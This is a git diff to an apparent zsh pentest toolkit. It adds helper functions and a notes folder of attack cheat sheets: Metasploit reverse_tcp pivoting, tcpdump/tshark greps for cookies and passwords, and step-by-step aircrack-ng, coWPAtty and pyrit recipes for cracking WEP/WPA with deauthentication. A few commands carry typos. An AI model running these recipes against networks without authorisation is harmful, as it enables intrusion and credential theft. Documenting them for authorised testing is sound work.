diff --git a/README.md b/README.md index 976f9d1..d36f7e3 100755 --- a/README.md +++ b/README.md @@ -9,22 +9,37 @@ Usability features: tor trigger (ton/tof), external ip check, tor check... and m Note: this project is a work in progress which we develop with one of my friend in our free time. If you use it, be prepared for some glitches. -Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. - -Installing full console after you have the dependencies: cp profile_files/.* -R ~/ - -Using only the pentest function can be done by including: pentest_functions.zsh +Works on Debian if the dependencies are met or on Kali. Probably works on Pentoo also. If the dependencies are not met, the functions will still run, but outputs will be empty - at least in the currently status. -Functions -========= +Install +======= -pawnpls - Automatically enumerate and start predefined attacks such as brute force. +Full console install: git clone https://github.com/51x/PTZ && cd PTZ && cp profile_files/.* -R ~/ + +Using only the pentest functions can be done by including just: pentest_functions.zsh +If you want also the notes/knowledge database, you shoul add the v3das folder to you ~/.ptz/ folder. + + +General function of PTZ +======================= + +pawnpls - Automatically enumerate and start predefined attacks such as brute force. Output goes to ~/.ptz/$target/ Example for single target: autopawn n0nexi-stent.com Example for multiple targets: autopawn "n0nex-1.com n0nex-2.com" -everythingworksornot\? - check if everything works or not for this script (tbd) +ptzdepchk - check if all dependencies are installed or not, print if something is missing + + +Notes functions +=============== + +n - query notes about a topic, use tab auto complete + +nls - list all the notes + +rnd - get random strings (lengths: 8,16,32,64) chk functions @@ -45,12 +60,3 @@ johnzip - Crack zip files using john johnrar - Crack rar files using john Example: johnrar data.rar rockyou.txt - - -help functions -============== - -hlp - Get help of the hlp command -hlprnd - Get random strings (lengths: 8,16,32,64) -hlp - Get help about - not yet implemented -i - Get information about a topic, use tab after i diff --git a/profile_files/.ptz/v3das/_n b/profile_files/.ptz/v3das/_n new file mode 100644 index 0000000..fb5f1ab --- /dev/null +++ b/profile_files/.ptz/v3das/_n @@ -0,0 +1,3 @@ +#compdef n + +_arguments "1: :( $(ls ~/.ptz/v3das/ ) )" diff --git a/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt new file mode 100644 index 0000000..995512a --- /dev/null +++ b/profile_files/.ptz/v3das/metasploit_meterpreter_pivoting.txt @@ -0,0 +1,17 @@ +# With "autoroute" it is possible to attack through the remote machine. + +# Start handler +use exploit/multi/handler +set payload windows/meterpreter/reverse_tcp +set lhost 10.1.1.1 + +# Add route to which network you want to look into +run autoroute -s 10.2.2.0/24 +run autoroute -p + +# Scan +use auxiliary/scanner/portscan/tcp +set RHOSTS 10.2.2.0/24 +set THREADS 50 +set ports 20,21,22,25,53,69,80,139,443,445,993,8080 + diff --git a/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt new file mode 100644 index 0000000..264636a --- /dev/null +++ b/profile_files/.ptz/v3das/network_sniffing_tcpdump_examples.txt @@ -0,0 +1,7 @@ + +tcpdump -r file.cap -vvvs 1024 -l -A host example.com | grep -i cookie +tcpdump -r file.cap -vvvs 1024 -l -A | egrep -i "host:|cookie:" +tcpdump -r file.cap -s 1024 -l -A dst domain.com + +tcpdump -A # show raw data + diff --git a/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt new file mode 100644 index 0000000..cf685d2 --- /dev/null +++ b/profile_files/.ptz/v3das/network_sniffing_tshark_examples.txt @@ -0,0 +1,11 @@ + +# tshark follow stream +tshark -r -R "" -T fields -e tcp.stream +tshark -q -r http.pcapng -z follow,tcp,ascii,1 + +# etc +tshark grep from http +tshark -r file.cap 'http' | egrep -i "login|pass" +tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' +tshark 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' -R'http.request.method == "GET" || http.request.method == "HEAD"' + diff --git a/profile_files/.ptz/v3das/network_switch_cisco_reset.txt b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt new file mode 100644 index 0000000..a2310d5 --- /dev/null +++ b/profile_files/.ptz/v3das/network_switch_cisco_reset.txt @@ -0,0 +1,7 @@ + +# reset a cisco switch +flash_init +dir flash: +rename flash:config.text flash:config.backup +boot + diff --git a/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt new file mode 100644 index 0000000..d8fca42 --- /dev/null +++ b/profile_files/.ptz/v3das/network_wireless_cracking_aircrack.txt @@ -0,0 +1,75 @@ +# cracking WEP with clients +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth +aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster +aircrack-ng -0 $CAP_FILE + + +# cracking WEP via a client +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake auth +aireplay-ng -2 -b $AP_MAC -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 mon0 # Interactive packet reply attack +aircrack-ng -0 -z -n 64 $CAP_FILE + + +# clientless WEP cracking +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -1 0 -e $AP_ESSID -a $AP_MAC -h $SELF_MAC mon0 # Fake-auth +aireplay-ng -5 -b $AP_MAC -h $SELF_MAC mon0 # Fragmentation attack for PRGA +aireplay-ng -4 -b $AP_MAC -h $SELF_MAC mon0 # If Frag attack fails, use Korek ChopChop attack for PRGA +packetforge-ng -0 -a $AP_MAC -h $SELF_MAC -l $SOURCE_IP -k $DESTINATION_IP -y $XOR_FILENAME -w $PACKET_FILENAME # After got PRGA +aireplay-ng -2 -r $PACKET_FILENAME mon0 # Interactive packet reply after crafted the packet +aircrack-ng -0 $CAP_FILE + + +# bypassing WEP SKA +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication attack for PRGA xor file +aireplay-ng -1 60 -e $AP_ESSID -y $PRGA_FILENAME -a $AP_MAC -h $SELF_MAC mon0 # Shared key fake auth attack +aireplay-ng -3 -b $AP_MAC -h $SELF_MAC mon0 # ARP Replay attack +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get an ARP packet faster +aircrack-ng -0 -z -n 64 $CAP_FILE + + +# cracking WPA PSK +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake +airacrack-ng -0 -w $WORDLIST $CAPTURE_FILE + + +# cracking WPA with John The Ripper +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake +# change to password folder +vim john.conf # Edit "List.Rules:Wordlist" --> add regex for more words eg. "$[0-9]$[0-9]" +./john --worldlist=$WORDLIST --rules --stdout | aircrack-ng -0 -e $AP_ESSID -w $CAPTURE_FILE + + +# cracking WPA with coWPAtty +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake +cowpatty -r $CAPTURE_FILE -f $WORDLIST -2 s $AP_ESSID +genpmk -f $WORDLIST -d HASH_FILENAME -s $AP_ESSID # Gen WPA hashes for rainbow attack +cowpatty -r $CAPTURE_FILE -d HASH_FILENAME -2 -s $AP_ESSID # Start the rainbow attack + + +# cracking WPA with pyrit +airmon-ng start wlan0 $AP_CHANNEL +airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $FILENAME mon0 +aireplay-ng -0 1 -a $AP_MAC -c $CLIENT_MAC mon0 # Deauthentication to get a 4 way handshake +pyrit list_cores +pyrit -r $CAPTURE_FILE -i $WORDLIST -b $AP_MAC attack_passthrough + +pyrit -i $WORDLIST import_password # Import the wordlist to the database +pyrit -e $AP_ESSID create_essid # Add ESSID to the database +pyrit batch +pyrit -r $CAPTURE_FILE attack_db + diff --git a/profile_files/.zsh/pentest_functions.zsh b/profile_files/.zsh/pentest_functions.zsh index 712a812..238f731 100644 --- a/profile_files/.zsh/pentest_functions.zsh +++ b/profile_files/.zsh/pentest_functions.zsh @@ -1,26 +1,54 @@ +# Experimental version! + debug=1 -function everythingworksornot"?" { - echo "really?" - # tba: dependency checks for all functions +fpath=(~/.ptz/v3das $fpath) +autoload -U compinit +compinit +zstyle ':completion:*' menu select=2 + +function nls { + echo "You can get help from the following topics:" + for f in ~/.ptz/v3das/* ; do + echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 + done } -function i { +function n { + # query knowledgebase, use tab after n if [ -d "~/.ptz/v3das" ] then - cat ~/.ptz/v3das/ + echo "knowledge base / notes are missing" + else + cat ~/.ptz/v3das/$1 fi } -function hlp { - echo "this function is not yet implemented" - if [ $# -ne 1 ] - then - echo "this function is not yet implemented" - return - fi +function ptzdepchk { + # check if dependencies are met or not + type john >/dev/null 2>&1 || { echo >&2 "john is missing."; } + type zip >/dev/null 2>&1 || { echo >&2 "zip is missing."; } + type rar >/dev/null 2>&1 || { echo >&2 "rar is missing."; } + type wget >/dev/null 2>&1 || { echo >&2 "wget is missing."; } + type openssl >/dev/null 2>&1 || { echo >&2 "openssl is missing."; } + type torsocks >/dev/null 2>&1 || { echo >&2 "torsocks is missing."; } + type tor >/dev/null 2>&1 || { echo >&2 "tor is missing."; } + type traceroute >/dev/null 2>&1 || { echo >&2 "traceroute is missing."; } + type theharvester >/dev/null 2>&1 || { echo >&2 "theharvester is missing."; } + type dnsenum >/dev/null 2>&1 || { echo >&2 "dnsenum is missing."; } + type fierce >/dev/null 2>&1 || { echo >&2 "fierce is missing."; } + type nmap >/dev/null 2>&1 || { echo >&2 "nmap is missing."; } + type searchsploit >/dev/null 2>&1 || { echo >&2 "searchsploit is missing."; } + type unzip >/dev/null 2>&1 || { echo >&2 "unzip is missing."; } + #type dig >/dev/null 2>&1 || { echo >&2 "dig is missing."; } + #type curl >/dev/null 2>&1 || { echo >&2 "curl is missing."; } + #type arachni >/dev/null 2>&1 || { echo >&2 "arachni is missing."; } + #type hydra >/dev/null 2>&1 || { echo >&2 "hydra is missing."; } + type python >/dev/null 2>&1 || { echo >&2 "python is missing."; } + #type dirb >/dev/null 2>&1 || { echo >&2 "dirb is missing."; } + } @@ -35,11 +63,13 @@ function tof { function tip { + # check if tor is really used or not wget -qO- https://check.torproject.org/ -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" | egrep -i "Congratulations. This browser is configured to use Tor.|Sorry. You are not using Tor." | uniq } function wip { + # check public ip if [ $RANDOM -gt $RANDOM ] then wget -qO- -U "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" ipecho.net/plain @@ -52,6 +82,7 @@ function wip { function chkhttpz { + # http response checks from a given host / port echo "HTTP responses" wget --spider -S "http://$1:$2/" 2>&1 | grep "HTTP/" @@ -61,19 +92,13 @@ function chkhttpz { function chkcrt { + # check ssl certificate of a server openssl s_client -showcerts -connect $1:$2 } -function hlp { - echo "You can get help from the following topics:" - for f in ~/.ptz/v3das/* ; do - echo $f | rev | cut -d'/' -f1 | rev |cut -d'.' -f1 - done -} - - -function hlprnd { +function rnd { + # get some random characters cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-8};echo; cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-16};echo; cat /dev/urandom | tr -dc _A-Z-a-z-0-9 | head -c${1:-32};echo;